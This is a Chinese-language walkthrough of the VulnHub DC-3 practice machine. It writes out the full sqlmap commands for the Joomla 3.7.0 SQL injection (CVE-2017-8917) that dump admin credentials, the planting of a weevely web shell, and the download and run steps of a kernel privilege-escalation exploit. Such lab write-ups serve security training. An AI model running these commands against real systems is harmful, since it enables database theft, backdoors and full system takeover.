VulnHub之DC-3

一个粗糙的信息收集

通过扫描端口信息，我们看到服务器只开放了一个80端口，运行的是Joomla框架

我们打开网站看看
在首页提示我们，这个靶机只有一个Flag，并且没有任何线索

使用dirb扫描一下目录，发现了一个Administrator的目录

使用joomscan扫描一下网站

https://github.com/rezasp/joomscan

通过扫描我们获得了Joomla框架的版本号为3.7.0和一些

在百度查了一下，Joomla 3.7.0存在一个CVE-2017-8917的一个SQL注入漏洞
使用searchspolit搜索

查看这个文件，里面记录了关于漏洞利用的一些方法

使用SQLMAP进行注入

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

得到数据库名

获取Joomladb的表

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

查看#__user表中的字段

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

获取表中的内容

sqlmap -u "http://192.168.31.26/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C 'id,username,password' --dump -p list[fullordering]

得到admin密码的hash，使用john进行破解得到密码

登录到后台发现可以创建文件，我们使用weevely生成一个shell文件，然后进行连接

生成shell

weevely http://192.168.31.26/templates/protostar/shell.php 123456

连接shell

weevely http://192.168.31.26/templates/protostar/shell.php 123456

但是权限是www-data，需要进行提权

查看内核版本

使用Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

下载提权需要的文件

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

执行下面的命令进行提权

tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

查看flag文件

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之MuzzyBox_WriteUp

扫描二维码

获取更多精彩

NowSec